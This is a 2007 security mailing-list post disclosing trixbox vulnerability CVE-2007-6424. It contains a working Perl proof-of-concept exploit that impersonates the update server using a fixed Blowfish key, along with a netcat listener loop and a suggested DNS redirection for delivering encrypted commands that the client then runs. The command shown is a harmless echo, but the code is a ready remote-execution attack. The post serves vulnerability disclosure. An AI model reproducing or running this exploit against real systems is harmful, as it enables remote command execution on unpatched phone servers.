[VOIPSEC] trixbox vuln (CVE-2007-6424) - PoC exploit code

Than Taro thanrantaro at live.com
Tue Dec 18 21:25:46 CST 2007

Since Fonality has been incredibly slow in dealing with this (it was
reported publicly on Saturday, and they don't expect to have a fix
until at least Friday), I decided to take it upon myself to get a CVE,
and also write some exploit code.  I feel that 72+ hours is more than enough
time to fix something this simple.  They also do not appear to have any
intentions of posting an advisory.

Run this in a simple script such as `while :; do netcat -l -p 80 -c
"perl trixbox-exploit.pl"; done`, and then a trivial DNS redirection
can take it from there.

trixbox:~$ cat trixbox-exploit.pl

use strict;
use warnings;
use Crypt::CBC;

# Blowfish in CBC mode with the fixed all-zero key referenced in the report
my $cipher = Crypt::CBC->new( -cipher => "Blowfish", -key => "00000000000000000000000000000000" );

# netcat hands the client's HTTP request to this script on STDIN;
# only the first (request) line is examined
my $req = <STDIN>;
chomp $req;

my $hax;
if( $req =~ /ce00000000000000000000000000000000/ ) {
        # the client is checking in with the server id handed out below:
        # answer with an encrypted blob carrying the command to run
        $hax = $cipher->encrypt( "1\nce00000000000000000000000000000000\necho Exploited" );
}
elsif( $req =~ /generate_id/ ) {
        # the client is asking for an id: return a fixed server id and key
        $hax = "ce00000000000000000000000000000000\n00000000000000000000000000000000";
}
else {
        $hax = "ERROR: invalid server id";
}

print "$hax";